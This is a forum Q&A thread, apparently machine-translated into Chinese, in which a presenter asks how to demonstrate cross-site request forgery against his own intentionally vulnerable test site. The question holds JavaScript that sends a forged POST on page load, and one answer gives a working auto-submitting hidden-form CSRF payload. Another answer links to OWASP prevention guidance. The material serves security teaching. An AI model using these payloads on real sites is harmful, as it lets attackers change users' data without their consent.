如何演示CSRF攻擊

Question

我正在向我們企業中的其他人介紹Web安全性，並且我想展示一些示例以產生更大的影響。

爲此我創建了一個容易受到此攻擊的小型網站，該網站只能在我們的網絡上訪問。

我現在試圖利用這種攻擊，但我一個問題：

如何用POST形式做到這一點？

我沒有問題，這與GET查詢，但與POST，我試圖用JavaScript做到這一點，沒有問題，如果我託管我的代碼在同一主機上，但如果我想承載我的代碼到另一個主機是更現實的，我被阻止，因爲它是一個跨域請求。

那麼我應該如何發送這些POST變量？

謝謝！

這裏是我當前的代碼：

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> 
<html> 
<head> 
<title>CSRF attack demo</title> 
<script type="text/javascript"> 
function getHTTPObject() { 
     var http = false; 
     //Use IE's ActiveX items to load the file. 
     if(typeof ActiveXObject != 'undefined') { 
      try {http = new ActiveXObject("Msxml2.XMLHTTP");} 
      catch (e) { 
       try {http = new ActiveXObject("Microsoft.XMLHTTP");} 
       catch (E) {http = false;} 
      } 
     //If ActiveX is not available, use the XMLHttpRequest of Firefox/Mozilla etc. to load the document. 
     } else if (window.XMLHttpRequest) { 
      try {http = new XMLHttpRequest();} 
      catch (e) {http = false;} 
     } 
     return http; 
    } 
function post_to_url(path, params, method) { 
    method = method || "post"; // Set method to post by default, if not specified. 

    // The rest of this code assumes you are not using a library. 
    // It can be made less wordy if you use one. 
    var form = document.createElement("form"); 
    form.setAttribute("method", method); 
    form.setAttribute("action", path); 

    for(var key in params) { 
     var hiddenField = document.createElement("input"); 
     hiddenField.setAttribute("type", "hidden"); 
     hiddenField.setAttribute("name", key); 
     hiddenField.setAttribute("value", params[key]); 

     form.appendChild(hiddenField); 
    } 

    document.body.appendChild(form); 
    form.submit(); 
} 

function postToUrlBackground(path, params){ 
    var http = getHTTPObject(); 

    http.open("POST", path, true); 

    //Send the proper header information along with the request 
    http.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); 
    http.setRequestHeader("Content-length", params.length); 
    http.setRequestHeader("Connection", "close"); 

    http.onreadystatechange = function() {//Call a function when the state changes. 
     if(http.readyState == 4 && http.status == 200) { 
      //alert("Response received"); 
     } 
    } 
    http.send(params); 
} 
function TryAttack(){ 
    //alert("Sending"); 
    postToUrlBackground("http://localhost:51612/Movie/Edit/1", "Title=%28500%29This+item+has+been+changed+without+any+rights&Year=2009&OriginalTitle=%28500%29+DAYS+OF+SUMMERS&Duration=5700&IDMC=500+JOURS+ENSEMBLE"); 
    //postToUrlBackground("http://localhost:51612/Movie/Edit/1","Title=%28500%29+JOURS+ENSEMBLE&Year=2009&OriginalTitle=%28500%29+DAYS+OF+SUMMERS&Duration=5700&IDMC=500+JOURS+ENSEMBLE" ); 
    //alert("sent"); 
} 
</script> 
</head> 
<body onload="TryAttack()"> 
<img src=image.png /> 
</body> 
</html> 

Answer 1

在「其他主機」（在攻擊者）你只是創建方法POST其action一個FORM（即當表單提交）是你脆弱的應用程序。然後在頁面上用JavaScript提交它。

像這樣：

<html><body> 

    <form name="csrf_form" action="http://VULNERABLE_APP/csrf.php" method="POST"> 
    <input type="hidden" name="csrf_param" value="POST_ATTACK"> 
    </form> 

    <script type="text/javascript">document.csrf_form.submit();</script> 
</body></html> 

這將提交一份POST從攻擊者的主機的脆弱的應用程序，當您打開該網頁。

Answer 2

下面的文章和例子應能幫助您演示CSRF攻擊。

http://www.troyhunt.com/2010/11/owasp-top-10-for-net-developers-part-5.html

CSRF預防

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

和＃2這個問題。 Basic cookie & CSRF question